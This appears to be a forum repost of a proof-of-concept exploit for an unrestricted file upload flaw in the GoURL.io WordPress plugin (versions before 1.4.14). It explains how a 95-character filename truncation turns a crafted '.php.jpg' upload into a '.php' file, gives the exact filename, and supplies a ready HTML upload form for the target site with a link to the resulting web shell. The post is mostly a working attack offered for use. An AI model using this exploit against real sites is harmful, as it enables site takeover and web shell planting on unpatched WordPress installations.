Jump to content

WordPress Plugin GoURL.io < 1.4.14 - File Upload


This CHT

Recommended Posts


        GoURL Unrestricted Upload Vulnerablity POC by @pouyadarabi      

        Vulnerable Fucntion: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
          After checking file extention substring was used for file name to select first 95 letter line #5655
          So enter file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
          will upload a file with .php extention in website :)




        Replace with target wordpress website
        Fill id param in form action to any active download product


    <form action="" method="POST" enctype="multipart/form-data">

        <input type="file" name="gourlimage2" />
        <input type="submit"/>

    <a href="">Shell link</a>


Link to post
Link to comment
Share on other sites


  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...